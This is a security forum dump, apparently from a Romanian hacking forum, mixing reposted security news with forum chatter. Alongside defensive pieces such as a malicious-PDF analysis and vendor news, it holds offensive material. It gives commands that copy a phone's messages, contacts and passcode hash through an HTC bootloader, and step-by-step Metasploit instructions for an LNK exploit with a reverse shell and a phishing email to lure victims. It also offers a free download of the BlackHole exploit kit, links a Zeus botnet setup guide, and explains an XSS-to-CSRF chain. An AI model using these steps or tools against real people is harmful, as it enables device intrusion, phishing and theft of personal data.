Nytro

Passcode bypass of the HTC Desire Z using an unexpected feature of the bootloader By cedric » Sunday 22 May 2011, 10:48 - General Android devices are becoming increasingly present everywhere. iPhone security has been analyzed by researchers -- however this is more difficult for Android devices due to the diversity of vendors and devices: each model has its own characteristics and has a unique combination of hardware and software. What will be discussed here is an unexpected feature of the stock HTC Desire Z bootloader that allows an attacker to access any file on the device before the Linux operating system starts, bypassing the passcode protection entirely. There is a great variety of Android devices from various manufacturers (HTC, Samsung, Motorola, etc.) and customised by numerous telecommunication operators (Orange, T-Mobile, etc.). Before loading the operating system (i.e. Android), these devices generally pre-load a bootloader. This bootloader is not open-source, contrary to the Android source code, and differs from one device to another. Some manufacturers implement a way for the end-user to interact with it using serial over USB. An example below of the available commands of an HTC Desire Z: hboot>h command list keytest heap boot reset powerdown rebootRUU heap_test rtask task enableqxdm gencheckpt list_partition_emmc load_emmc check_emmc check_emmc_mid read_emmc get_wp_info_emmc send_wp_info_emmc get_ext_csd_emmc get_sector_info_emmc One command that got my attention is the read_emmc command. hboot>read_emmc command format: read_emmc [start] [#blocks] [#blocks/read] [show] You can specify the starting offset with the number of blocks to read and it will basically display to you in hexadecimal format the bytes that are on your phone's flash. Below is the first sector that is actually a partition table. hboot>read_emmc 0 1 1 1 reading sector 0 ~ 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ... 0 0 0 0 0 0 0 0 0 0 0 0 0 0 80 0 0 0 4D 0 0 0 1 0 0 0 E8 3 0 0 0 0 0 0 45 0 0 0 E9 3 0 0 80 0 0 0 0 0 0 0 46 0 0 0 69 4 0 0 28 23 0 0 0 0 0 0 5 0 0 0 91 27 0 0 6E 58 45 0 55 AA read sector done average = 583 The first idea that came to my mind is to dump the whole flash using this method but it is really slow. It took 6 hours to dump 10 MB so it will take approximatively 33 days to get 1,3 GB... So I decided to use FUSE (Filesystem in Userspace) to mount the user data partition remotely and get only the files I want. You basically have to implement those four functions: getattr, readdir, open and read. The phone's filesystem becomes accessible through one device file, let's name it dev. Reads on this file will be proxied by FUSE over USB to the read_emmc implementation on the device. Writes will not be implemented because we do not need them (and we do not have commands such as write_emmc . Consequently, this dev file will have *read only* attributes. # ls -l mnt total 0 -r--r--r-- 1 root root 1232076288 1970-01-01 01:00 dev We now have a virtual disk image that we are able to mount and get the files we are interested in: # dd if=mnt/dev of=first_sector bs=512 count=1 # mount -o loop,ro -t ext2 mnt/dev mnt2 # cp mnt2/data/com.android.providers.telephony/databases/mmssms.db dump/ # cp mnt2/data/com.android.providers.contacts/databases/contacts2.db dump/ Finally, we are able to get the files storing the passcode information (as a numerical PIN code for example below) if the end-user defined one. # cp mnt2/data/com.android.providers.settings/databases/settings.db dump/ # cp mnt2/system/password.key dump/ The salt is stored in the settings.db SQLite database. The passcode is simply stored in a hash form in password.key: SHA-1(password|salt)|MD5(password|salt) So it is easy to bruteforce from the computer once we get the file. This basically shows how some devices may implement things or leave some doors open in a way that allows an attacker to bypass security protections... Sursa: Passcode bypass of the HTC Desire Z using an unexpected feature of the bootloader - Sogeti ESEC Lab

Inside a Malicious PDF Attack By Tomer Bitton, Security Research, Imperva PDFs are widely used business file format, which makes them a common target for malware attacks. On the surface, PDFs are secure, but because they have so many “features,” hackers have learned how to hide attacks deep under the surface. By using a number of utilities, we are able to reverse engineer the techniques in malicious PDFs, providing insight that we can ultimately use to better protect our systems. PDF as Text By opening the PDF file with a text editor it is possible to see that there are some encrypted objects. The first circle, object 11, is a command to execute Javascript in object 12. The second and third circles, are a command for object 12 to filter the Javascript with AsciiHexDecode. The main reason for this filter is to hide malicious code inside the PDF and avoid anti-virus detection. This is our first red flag. Decoding the Hex This second image shows how the stream is decoded, but additional analysis is required to make sense of it. Again, we will open this code with a text editor to understand its purpose. Hex as Text Opening this code as text, the circle indicates it is Javascript, which is another red flag. We will now work to determine its intent. Malzilla Analysis of Javascript By using a utility called Malzilla, we can analyze the Javascript. We input the Javascript in the top box and decode it with the circled button. A closer look at the second circle indicates that this Javascript contains shellcode, yet another red flag. A Closer Look at the Shellcode This is a closer view of the shellcode. Shellcode is typically used to exploit vulnerabilities while avoiding detection. Shellcode has earned its name for launching a command shell for the attacker to control. Shellcode as Exe Again, we run a utility, this time to convert the shellcode into an Executable file, which we save, so that we can take an even closer look at its function. Exe through IDA Here, we run yet another utility, IDA, which enables us to disassemble and debug the commands of the Executable file. As we have highlighted, this file contains multiple Nop slide functions, which are used in Shellcode attacks since the location of the Shellcode is not precisely known. This raises another red flag. From here, we should see if there are any interesting binary strings. Binary Strings Here we have circled multiple binary strings that should raise concern. One of the circled items, URLDownloadToFileA, is a Windows API function to download a file from a remote server and to save it on the user’s PC. In this infected PDF, the shellcode uses it to point the PC to an infection point, which is the IP address we have circled (by the way, don’t visit that IP address). Once the infected file is downloaded, the shellcode will execute it, infecting the computer.There you have it! Like “Inception,” you have to go deeper to find what is truly at the heart of this infected PDF. Hackers are intelligent about wrapping Executable files in shellcode, encrypting it and hiding it in Javascript within PDF files, but by reverse engineering their techniques, we gain a better understanding of our vulnerabilities and can work to strengthen our security posture. Tomer Bitton is a security researcher at Imperva. Sursa: Inside a Malicious PDF Attack | threatpost

Setup Zeus as a hidden service How to setup Zeus 2.0.89 as a hidden service using the tor2web proxy, runing Tor through a logless VPN in Ubuntu 10.10 in a VM. Video: http://vimeo.com/20854260

A practical attack - LNK exploit Notes 1. sudo ./msfconsole 2. use windows/browser/ms10_046_shortcut_icon_dllloader excellent Microsoft Windows Shell LNK Code Execution 3. set SRVHOST 192.168.175.129 4. set Payload windows/meterpreter/reverse_tcp 5. set LHOST 192.168.175.129 6. exploit 7. go to shorturl.com and create a short url for your machines ip 8. Write an email enticing the recipient to click the link. 9. use metaterpreter. 10. pwnage. Video: http://vimeo.com/16699569

BlackHole Exploit Kit 1.0.2 irst Public Release of BlackHole Exploit Kit. BlackHole exploit kit is yet another in an ongoing wave of attack toolkits flooding the underground market. The kit first appeared on the crimeware market in September of 2010 and ever since then has quickly been gaining market share over its vast number of competitors. In fact, many antivirus vendors now claim that this is one of the most prevalent exploit kits used in the wild. Even Malware Domain List is showing quite a few domains infected with the BlackHole exploit kit. Black Market Cost : Users can purchase the annual license for $1500, semi-annual license for $1000, or just a quarterly license for $700. The license includes free software updates for the duration of the contract. For those malicious users with a commitment phobia the makers of the kit offer yet another solution. You can rent the kit (on the author’s servers) for $50 for 24 hours, $200 for 1 week, $300 for 2 weeks, $400 for 3 week, and $500 for 4 weeks. A domain name comes included with the rental agreement, but should you desire to change it you need to pay another $35. But Now its FREE HERE ! Feature : One highly touted feature of BlackHole toolkit is its TDS or Traffic Direction Script. While this is not an entirely new concept in attack toolkits the TDS included her is much more sophisticated and powerful than those in other kits. A TDS is basically an engine that allows redirection of traffic through a set of rules. For example, a user can set up a set of rules that redirect flow to different landing pages on their domain. These rules could be based on operating system, browser, country of origin, exploit, files, etc. One rule might redirect traffic to page A for all users that are running Windows OS from XP to Vista and running IE 8, while another rule can redirect Windows 7 users to page B. Those were just simple example rules. More advanced rules could set expiration dates for certain payloads and replace them with new ones when the date is reached. The TDS included in BlackHole even goes the extra step and allows you to create traffic flows based on these rules and provides management interface for the flows. A savvy malicious user with a lot of experience could easily utilize this rule engine to increase their infection numbers.From a web application standpoint BlackHole is built just like other kits, consisting of a PHP and MySQL backend. Since the majority of web servers run on the LAMP stack this enabled for very easy application deployment. The user interface for this kit is a cut about the rest, and it definitely looks nicer than almost any other attack kit we’ve analyzed. It resembles some of the best legitimate web apps we see in the world of commercial software. Download Link : http://www.multiupload.com/ZTZPEA9L5Y Sursa: BlackHole Exploit Kit 1.0.2 - Download ! ~ THN : The Hackers News

Arachni v.0.2.3 - Open Source Web Application Security Scanner Framework Arachni is a feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of web applications.Arachni is smart, it trains itself by learning from the HTTP responses it receives during the audit process.Unlike other scanners, Arachni takes into account the dynamic nature of web applications and can detect changes caused while travelling through the paths of a web application's cyclomatic complexity.This way attack/input vectors that http://www.blogger.com/img/blank.gifwould otherwise be undetectable by non-humans are seamlessly handled by Arachni. The main focus of this release has been on distributed deployment and bugfixing.Main additions include the update of the HTML report to include false positive reporting functionality and an updated WebUI with support for multiple Dispatchers. Informatii, tot: https://github.com/Zapotek/arachni/ Sursa: Arachni v.0.2.3 - Open Source Web Application Security Scanner Framework ~ THN : The Hackers News

iAWACS 2011 Forensics challenge Sunday, May 22, 2011 Hi to all (French version below) The Forensics challenge for iAWACS 2011 is now open. It is inspired from a real case on which a new information hiding techniques has been created. The aim is to test its strength and its security on a almost real implementation (and not with respect to academic conditions). Tactical scheme: a terrorist attack against the RSSIL 2011 event has been prepared according to some intelligence reports. A terrorist has been caught by the French police forces while he was about to recuperate a cell phone hidden in a geocache. Despite the efforts of the Police forensics and technical teams, the analysis of the cell phone has not been successful yet. However, the analysis proved that the Dcim directory is containing a secret message hidden. The terrorist confessed that he was waiting for a call to him on this cell phone to receive instructions about another geocache. This second one contains a SD card with the application to access the secret message. Unfortunately, this call will never happen (newspapers have leaked on this arrest). So will you be clever and imaginative enough to recover the secret message and prevent the attack against RSSIL 2011? Here are the condition for the challenge: * Opening date: May 22nd, 2011. The file dcim.tgz contains the Camera directory (the phone is a Samsung Galaxy S). * Award ceremony (if any winner) or technical hints at the RSSIL 2011 event to go on with the challenge. * End of the challenge: December 31st, 2011. * The solution must sent to iawacs@esiea.fr. Rules of the challenge: * The prize (5000 euros) will be awarded to anyone able to recover the message and the hiding mechanism only. * The technical mechanism will not be disclosed (unless by a potential winner who is free to publish any information with respect to it) by the organizers of the challenge. Only the secret message will be published once the challenge is closed. * Any partial solution, hint or valuable information will be considered for a honor award. Have a nice challenge and good luck guys! Sursa: Operational cryptology and virology lab: iAWACS 2011 Forensics challenge

Alo, tu ai citit ce am scris? Ma refeream la aia care imi dadeau add si nici nu stiau cine sunt sau ma intrebau cum se face server de metin. Unde cacat am zis eu "jegosi"? Pe messenger am zis "aveam multi boscheti in lista" - deci nu toti. Iar mai sus "tot ratatii care ma bagau in lista ma intrebau cine sunt" - deci doar m-am referit la aia care nu stiau cine sunt. Unde te-ai simtit bagat in aceeasi oala? Si ce e atat de important la mail-ul tau? Nu am postat nicaieri o lista cu toate ID-urile, o are un singur ratat care probabil nu stie ce sa faca cu ea. Ce prejudicii morale si financiare ti-a adus faptul ca O PERSOANA cunoaste mail-ul tau? Ce cacat a facut cu el? Ce e cu fitele astea?

Eu prefer berea, e mai naturala. Nici nu stiu de cand nu am mai baut Cola/Pepsi. Bere nu am mai baut de ieri...

Ca sa intelega toata lumea. Acum ceva timp, eu foloseam acel ID: nytro_rst pentru a mai discuta cu memri si alte lucruri care la inceput erau utile. Dar ma trezeam cu zeci de add-uri, ceea ce nu prea ma interesa, dar tot ratatii care ma bagau in lista ma intrebau cine sunt. De asemenea era aiurea sa mi se tot ceara conturi de metin, sau cum se face un server de metin, programe de spart parole sau keyloggere si alte prostii. Si am ajuns rapid la concluzia ca acel ID, pe care cred ca adunasem 1000 de ID-uri, este inutil. Il mai foloseam sa dau cate un mass cu cate ceva legat de RST, dar la fel, inutil, majoritatea nici nu cred ca stiau de RST, sau cel putin o buna parte. Si am ales o solutie stupida, dat fiind faptul ca nu imi pasa de acel ID: dau mass cu parola, si o si postez aici, pe RST. Si asta am si facut. La 1 minut dupa mass-ul in care spuneam care e parola contunui, deja se logase cineva pe contul meu si la 2 minute cred ca era deja schimbata parola. Insa am postat aici pe RST, la Offtopic, unde intra toata lumea sa vada cum sta treaba, si majoritatea au inteles. Si ratatul ala a dat si la inceput vreo 2-3 astfel de mass-uri, dar cred ca si-au batut multi joc de el, si eu parca l-am intrebat ceva de pe un alt ID si am vazut ca nu prea ul duce capul, apoi nu a mai dat. Insa se pare ca mai incearca si el cate ceva. Desigur, daca va trebuie scannere SMTP, SSH sau Keyloggere, luati, dati-i inainte, dar sa nu va vaitati ca sunt infectate. PS: O sa analizez maine fisierul acela de pe megaupload, pe care il tot imprastie, sa vad despre ce e vorba.

Nu cred ca are rost, oricum s-a mai discutat. Cate topicuri referitoare la Linux ati deschis? In cate deja deschise ati comentat cu ceva util? Daca aveti Linux, nu inseamna ca veti si posta cate ceva pe acolo.

Nu am facut-o publica, o are doar un boschetar care nu stie cum sa infecteze si el lumea sa faca rost de conturi de filelist. Nici macar nu scrie frumos si aranjat ca mine...

NU sunt eu ala. Am dat mass cu parola, apoi am postat-o pe RST. Se pare ca un ratat incearca sa va infecteze. Si se pare ca nu ma stresez.

Daca tot te-ai obosit sa pui o intrebare stupida, de ce nu te-ai obosit si sa o gandesti? Hardul e mare, si ai multe date pe el. Si intr-o astfel de zona necunoscuta, dupa ce ai sters un fisier, intr-o zona libera de pe hard se afla fisierul tau sters. Adica acolo, unde e spatiu liber pe hard, in tot acel spatiu liber, pe undeva, se afla fisierul tau. Recuperarea dupa cum, daca gandesti putin, nu e deloc simpla. Trebuie sa parcurgi intreaga zona libera de pe hard si sa verifici ce ar putea fi fisier. Salvarea ar veni de la tipurile de fisiere: daca e fisier text, contine numai date text, si iti poti da seama ca poate reprezenta ceva. Daca e o arhiva, are o structura bine definita si o poti recupera. Daca e o imagine Bitmap sa zicem, primii octeti vor fi "BMP" parca, si poti recupera. Doar ca recuperarea poate sa se faca partial sau deloc, slabe sanse sa se faca o recuperare completa. Bine, lucrurile sunt mai complicate de atat...

Offtopic. Ce ma intereseaza pe mine ca nu iti convine ce se intampla aici? Nu iti convine, nu citesti. Si nu dai ordine sa se inchida topicul.

Huge list of Windows 7 Shell Commands Posted by Paul Foty in April 6th 2009 Shell commands are incredibly useful when creating shortcuts or quickly accessing hard to get to locations. They can be used to pin shortcuts to the Taskbar or just to make your life easier. For those that are preceded by “Shell:” when using them in shortcuts you need to add “explorer.exe” in front of them. It should then look like this: explorer.exe shell:Personal [B]Windows 7 Only[/B] shell:Libraries shell:MusicLibrary shell:VideosLibrary shell:OtherUsersFolder shell:Device Metadata Store shell:PublicSuggestedLocations shell:DocumentsLibrary shell:User Pinned shell:UsersLibrariesFolder shell:PicturesLibrary shell:ImplicitAppShortcuts shell:Ringtones shell:CommonRingtones [B]Windows Vista & 7[/B] shell:Common Programs shell:GameTasks shell:UserProfiles shell:MyComputerFolder shell:SyncSetupFolder shell:DpapiKeys shell:SamplePlaylists shell:Favorites shell:My Video shell:SearchHomeFolder shell:System shell:CommonVideo shell:SyncResultsFolder shell:LocalizedResourcesDir shell:Cookies shell:Original Images shell:CommonMusic shell:My Pictures shell:Cache shell:Downloads shell:CommonDownloads shell:AppData shell:SyncCenterFolder shell:My Music shell:ConflictFolder shell:SavedGames shell:InternetFolder shell:Quick Launch shell:SystemCertificates shell:Contacts shell:TreePropertiesFolder shell:Profile shell:Start Menu shell:Common AppData shell:PhotoAlbums shell:ConnectionsFolder shell:Administrative Tools shell:PrintersFolder shell:Default Gadgets shell:ProgramFilesX86 shell:Searches shell:Common Startup shell:ControlPanelFolder shell:SampleVideos shell:SendTo shell:ResourceDir shell:ProgramFiles shell:CredentialManager shell:PrintHood shell:MAPIFolder shell:CD Burning shell:AppUpdatesFolder shell:Common Start Menu shell:LocalAppDataLow shell:Templates shell:Gadgets shell:Programs shell:Recent shell:SampleMusic shell:Desktop shell:CommonPictures shell:RecycleBinFolder shell:CryptoKeys shell:Common Templates shell:Startup shell:Links shell:OEM Links shell:SamplePictures shell:Common Desktop shell:NetHood shell:Games shell:Common Administrative Tools shell:NetworkPlacesFolder shell:SystemX86 shell:History shell:AddNewProgramsFolder shell:Playlists shell:ProgramFilesCommonX86 shell:PublicGameTasks shell:ChangeRemoveProgramsFolder shell:Public shell:Common Documents shell:CSCFolder shell:Local AppData shell:Windows shell:UsersFilesFolder shell:ProgramFilesCommon shell:Fonts shell:Personal [B]Windows 7 Shortcuts[/B] I compiled the following list with an early Alpha build of Windows 7. It is possible that some of these have changed with newer versions. If you find one that is wrong please let me know so I can correct it. Wireless Networks pop-up rundll32.exe van.dll,RunVAN Advanced Restore sdclt.exe /restorewizardadmin Restore Files sdclt.exe /restorewizard Backup Location & Settings sdclt.exe /configure Add Network Location (wizard) rundll32.exe shwebsvc.dll,AddNetPlaceRunDll Indexing Options control.exe srchadmin.dll Notification Cache rundll32.exe shell32.dll,Options_RunDLL 5 Aero (Transparency) Off Rundll32.exe DwmApi #104 Aero (Transparency) On Rundll32.exe DwmApi #102 Welcome Center rundll32.exe oobefldr.dll,ShowWelcomeCenter Add/Remove Programs RunDll32.exe shell32.dll,Control_RunDLL appwiz.cpl,,0 Content Advisor RunDll32.exe msrating.dll,RatingSetupUI Control Panel RunDll32.exe shell32.dll,Control_RunDLL Date and Time Properties RunDll32.exe shell32.dll,Control_RunDLL timedate.cpl Display Settings RunDll32.exe shell32.dll,Control_RunDLL access.cpl,,3 Device Manager RunDll32.exe devmgr.dll DeviceManager_Execute Folder Options – File Types RunDll32.exe shell32.dll,Control_Options 2 Folder Options – General RunDll32.exe shell32.dll,Options_RunDLL 0 Folder Options – Search RunDll32.exe shell32.dll,Options_RunDLL 2 Folder Options – View RunDll32.exe shell32.dll,Options_RunDLL 7 Forgotten Password Wizard RunDll32.exe keymgr.dll,PRShowSaveWizardExW Hibernate RunDll32.exe powrprof.dll,SetSuspendState Keyboard Properties RunDll32.exe shell32.dll,Control_RunDLL main.cpl @1 Lock Screen RunDll32.exe user32.dll,LockWorkStation Mouse Properties RunDll32.exe shell32.dll,Control_RunDLL main.cpl @0 Map Network Drive RunDll32.exe shell32.dll,SHHelpShortcuts_RunDLL Connect Network Connections RunDll32.exe shell32.dll,Control_RunDLL ncpa.cpl Power Options RunDll32.exe Shell32.dll,Control_RunDLL powercfg.cpl Regional Settings RunDll32.exe shell32.dll,Control_RunDLL intl.cpl,,3 Stored Usernames and Passwords RunDll32.exe keymgr.dll,KRShowKeyMgr System Properties: Advanced RunDll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,4 System Properties: Automatic Updates RunDll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,5 Taskbar Properties RunDll32.exe shell32.dll,Options_RunDLL 1 User Accounts RunDll32.exe shell32.dll,Control_RunDLL nusrmgr.cpl Windows Security Center RunDll32.exe shell32.dll,Control_RunDLL wscui.cpl Windows – About RunDll32.exe SHELL32.DLL,ShellAboutW Unplug/Eject Hardware RunDll32.exe shell32.dll,Control_RunDLL hotplug.dll Windows Firewall RunDll32.exe shell32.dll,Control_RunDLL firewall.cpl Wireless Network Setup RunDll32.exe shell32.dll,Control_RunDLL NetSetup.cpl,@0,WNSW Open Control Panel (All Items) explorer.exe shell:::{21ec2020-3aea-1069-a2dd-08002b30309d} Manage Wireless Networks explorer.exe shell:::{1fa9085f-25a2-489b-85d4-86326eedcd87} Sound Control Playback Tab rundll32.exe shell32.dll,Control_RunDLLmmsys.cpl Sound Control Sounds Tab rundll32.exe shell32.dll,Control_RunDLLmmsys.cpl,,2 Sound Control Recording Tab rundll32.exe shell32.dll,Control_RunDLLmmsys.cpl,,1 Add/Remove Programs rundll32.exe shell32.dll,Control_RunDLL appwiz.cpl Add/Remove Windows Components rundll32.exe shell32.dll,Control_RunDLL appwiz.cpl,,2 Set Program Access and Computer Defaults rundll32.exe shell32.dll,Control_RunDLL appwiz.cpl,,3 People Near Me rundll32.exe shell32.dll,Control_RunDLL collab.cpl People Near Me Sign In Tab rundll32.exe shell32.dll,Control_RunDLL collab.cpl,,1 Screen Resolution rundll32.exe shell32.dll,Control_RunDLL desk.cpl Personalization rundll32.exe shell32.dll,Control_RunDLL desk.cpl,,2 Screen Saver rundll32.exe shell32.dll,Control_RunDLL desk.cpl,,1 Windows Firewall rundll32.exe shell32.dll,Control_RunDLL firewall.cpl Device Manager rundll32.exe shell32.dll,Control_RunDLL hdwwiz.cpl Power Options rundll32.exe shell32.dll,Control_RunDLL powercfg.cpl Power Options Change Plan Settings rundll32.exe shell32.dll,Control_RunDLL powercfg.cpl,,1 System Properties rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl System Properties Hardware Tab rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,2 System Properties Advanced Tab rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,3 System Properties System Protection Tab rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,4 System Properties Remote Tab rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,5 Pen and Touch Tablet PC Settings rundll32.exe shell32.dll,Control_RunDLL tabletpc.cpl Pen and Touch Tablet PC Settings Flicks Tab rundll32.exe shell32.dll,Control_RunDLL tabletpc.cpl,,1 Pen and Touch Tablet PC Settings Handwriting Tab rundll32.exe shell32.dll,Control_RunDLL tabletpc.cpl,,2 Phone and Modem Options rundll32.exe shell32.dll,Control_RunDLL telephon.cpl Phone and Modem Options Modems Tab rundll32.exe shell32.dll,Control_RunDLL telephon.cpl,,1 Phone and Modems Options Advanced Tab rundll32.exe shell32.dll,Control_RunDLL telephon.cpl,,2 Date and Time rundll32.exe shell32.dll,Control_RunDLL timedate.cpl Date and Time Additional Clocks rundll32.exe shell32.dll,Control_RunDLL timedate.cpl,,1 Action Center rundll32.exe shell32.dll,Control_RunDLL wscui.cpl Unplug/Eject Hardware RunDll32.exe shell32.dll,Control_RunDLL hotplug.dll Internet Explorer Specific Commands Delete Temporary Internet Files: RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 8 Delete Cookies: RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 2 Delete History: RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 1 Delete Form Data: RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 16 Delete Passwords: RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 32 Delete All: RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 255 Delete All + files and settings stored by Add-ons: RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 4351 Miscellaneous Variables Windows Directory %WINDIR% %SYSTEMROOT% Hard Drive That Contains OS %HOMEDRIVE% Users Home Directory %HOMEPATH% %USERPROFILE% Default Temporary Directory %TEMP% %TMP% Program Files %PROGRAMFILES% Current Users Application Data Directory %APPDATA% Sursa: Huge list of Windows 7 Shell Commands | OS Attack

Anonymous leaks PSN SSH Logs, Sony is responsible for Data Theft ? 1.) On the Sony servers running the highly outdated Open SSH version 4.4. 2.) Current version is 5.7. For those of Sony for encrypted version are used for more than five years several known security holes. 3.) Sony server running in part to the long-outdated software Apache 2.2.10. 4.) Current version is 2.2.17. The version used by Sony is vulnerable to damaging Internet attacks, such as overload attacks (DDOS). Outdated server software may have caused outage Allowing PSN hackers to enter PlayStation Network stealing more than 100 million user data sets from PSN and SOE. Since the allegation itself isn't exactly new, correct, there are new proofs that this rumor is. Report even claims that Sony lies when it comes to the statement of outdated servers. Computer Bild got an excerpt showing log files that proof that Sony was, as of the hacking attack, using very outdated server software, searchable as OpenSSH 4.4 - current version is 5.7. Back in 2006 there were reports about OpenSSH 3.x and 4.x, and the security issues those versions utilize. But SSH was not the only open door for hackers: Sony used to outdated version of the Apache webserver as well. Apache server was found on Sony's current version is 2.2.10 while 2.2.17. Sun Sony made it easy for hackers to access sensitive data since summer 2009 as there were bug reports about "dangerous security issues" Mentioned in the version, as Hamburger Press states. Guido Alt, spokesman for Sony Germany, told Computer Bild that he was not handed any information about Sony using old server software. But since Anonymous' log files show log-ons to Sony-servers, Sony could seriously be in trouble. Although those logs would not be valid evidence in a court unless Sony approve them, community pressure will become a serious topic to Sony. At least for now, they have to tell the truth - now where logs are handed around the press. Sursa: Anonymous leaks PSN SSH Logs, Sony is responsible for Data Theft ? ~ THN : The Hackers News

Facebook Prepares to Launch Bug Bounty Program Facebook is working on setting up a bug bounty program that would encourage security researchers to discover vulnerabilities on its platform and report them responsibly. Mr. Joe Sullivan, Facebook's chief security officer, told us today at the Hack in the Box Amsterdam 2011 security conference that the company is currently testing such a system and hopes to launch it soon. Vulnerability reward programs are not new. In fact, they've been around since the Netscape era. In 2004 Mozilla introduced a bug bounty system for vulnerabilities discovered in Firefox, then last year Google did the same for Chromium, the open source project behind Google Chrome. However, it was Google that began rewarding vulnerabilities found in its web services first, a move that was mirrored by Mozilla a month later. Facebook has a pretty good relationship with security researchers already and many of them are reporting vulnerabilities to the company responsibly. In fact, Facebook is one of the few companies that explicitly state in their official policies that as long as the vulnerability reporter doesn't exploit it to damage the system or compromise the data, it will not take legal action against them or notify the authorities. This might seem common sense to many and it is how most large vendors do act in practice, but Facebook is one of the very few that guarantee it in writing : https://www.facebook.com/security?v=app_6009294086 Bug bounty programs are not only about rewarding researchers, which is an honorable thing to do, but also about drawing security attention towards a particular product or service. Since more people will be interested to poke around it and uncover flaws, the system will become more and more secure and there will be less flaws for cyber criminals to find. No details about the program's possible payouts or rules have been released, but we're hoping the rewards will at least match those offered by Mozilla and Google. Sursa: Facebook Prepares to Launch Bug Bounty Program ! ~ THN : The Hackers News

Pe site-ul vulnerabil la XSS, poti pune (prin XSS) un iframe catre "site_csrf.com/pagina.php?sterge_user?id=123" de exemplu, care, neavand o protectie, in cazul vizitarii paginii pe care ai XSS a unui administrator de exemplu, ar fi sters utilizatorul cu id-ul 123. A doua intrebare nu cred ca am inteles-o. Daca prin XSS poti injecta orice cod HTML/JavaScript, nu vei avea nici o limitare, ar fi ca si cum ti-ai face un site si ai pune <iframe> catre site-ul cu CSRF pe el.

Daca inchid topicul dau warn la 80% dintre cei care au postat aici, adica si voua, celor care ne dati ordine sa inchidem acest topic.

root@rst:/home/nytro# uname -a Linux rst 2.6.39nytro #1 SMP Fri May 20 01:14:36 EEST 2011 i686 GNU/Linux root@rst:/home/nytro# Am uitat sa pun cratima. Sa vedem daca apar probleme... Edit: Super, nu mai am probleme cu airmon-ng, mi-am reinstalat driver-ul (rtl-8192se) si merge perfect, imi place

Standard Template Library (STL), 1 of n Stephan T. Lavavej Welcome to another installment of C9 Lectures. In the following series, learn all about STL from the great Stephan T. Lavavej, Microsoft's keeper of the STL cloth (this means he manages the partnership with the owners of STL and Microsoft, including, of course, bug fixes and enhancements to the STL that ships as part of Visual C++). In this first part, Stephan introduces STL and then demonstrates many of its core features (iterators, algorithms, and data structures). As is Stephan's nature, he elaborates on technical details in very substantive way. The Standard Template Library, or STL, is a C++ library of container classes, algorithms, and iterators. STL provides many fundamental algorithms and data structures. The STL is a general purpose library: its components are heavily parameterized such that almost every component in the STL is a template. This is not an introductory series on C++. As such, it is expected that viewers already possess a working knowledge of the C++ language. Go ahead and open VC++ IDE and follow along--there are many examples provided on-screen and Stephan will monitor this thread and answer questions. Enjoy. Learn. Books mentioned by Stephen: The C++ Standard Library: A Tutorial And Reference by Nicolai M. Josuttis Effective STL by Scott Meyers [sTL Introduction lecture links] Part 1 (sequence containers) Part 2 (associative containers) Part 3 (smart pointers) Part 4 (Nurikabe solver) Part 5 (Nurikabe solver, continued) Part 6 (algorithms and functors) Part 7 (algorithms and functors, continued) Part 8 (regular expressions) Part 9 (rvalue references) Part 10 (type traits) Sursa: C9 Lectures: Stephan T. Lavavej - Standard Template Library (STL), 1 of n | Going Deep | Channel 9

Google fixing Android Wi-Fi snooping flaw Angela MoscaritoloMay 19, 2011 Google on Wednesday began distributing a patch to address a security flaw in all but the latest versions of its Android mobile operating system. The vulnerability could allow an attacker to snoop on phones used on unencrypted Wi-Fi networks to gain access to calendar and contacts information. “This fix requires no action from users and will roll out globally over the next few days," Google said in a statement sent to SCMagazineUS.com on Thursday The search giant's update forces an HTTPS connection to encrypt traffic from Android devices to Google Calendar and Contacts servers, so an attacker listening in on an unprotected Wi-Fi network cannot intercept the authentication tokens, known as authTokens, used to validate devices. Google's fix is being implemented on the server side, meaning it does not require a software update. Google is still investigating whether the issue affects its Picasa Web Albums service, which reportedly also is affected. In a report released Friday, a team of researchers at Germany's Ulm University revealed that an attacker could use a packet analyzer tool, such as Wireshark, on unencrypted Wi-Fi networks to capture the authTokens used by Android devices when communicating with certain Google services. Once captured, an adversary could use the authToken to gain full access to a user's Calendar and Contacts data. The issue does not affect the latest Android versions, 3.0 for tablets and 2.3.4 for smartphones, but does impact 99.7 percent of all Android smartphones, which use the vulnerable versions 2.3.3 and later, according to Bastian Könings, Jens Nickels and Florian Schaub, the Ulm University researchers who authored the report. Worse, the sniffed Calendar authTokens are potentially valid for two weeks, enabling adversaries to capture the tokens, then make use of them at different times and locations, the researchers said. The issue involves the ClientLogin authentication protocol, which allows users to gain access to their Google Calendar or Contacts account from inside the corresponding Android application. To access these services, the installed application makes a ClientLogin call to Google's authorization service and provides the user's login credentials. Upon successful login, Google provides the application with an authToken that can be used to access the requested data. It is “possible and quite easy” to launch such an attack against Google Calendar, Contacts and Picasa Web Albums service, they added. Because the issue does not reside in the Android platform itself, Google does not have to rely on its carriers to deliver the fix, which is rolling out over the next several days. In the meantime, researchers cautioned users to avoid accessing affected apps on open Wi-Fi networks. Joe Pappano, vice president of technical services at mobile device management company Fiberlink, told SCMagazineUS.com in an email Thursday that this flaw does not necessarily pose a significant risk to enterprises but it brings to mind a fundamental security concern involving the Android devices. “Most companies are taking a wait-and-see approach to Android adoption,” he said. "The primary reason why companies are concerned about large-scale Android deployments is due to how powerless they are to address significant Android vulnerabilities.” Sursa: Google fixing Android Wi-Fi snooping flaw - SC Magazine US

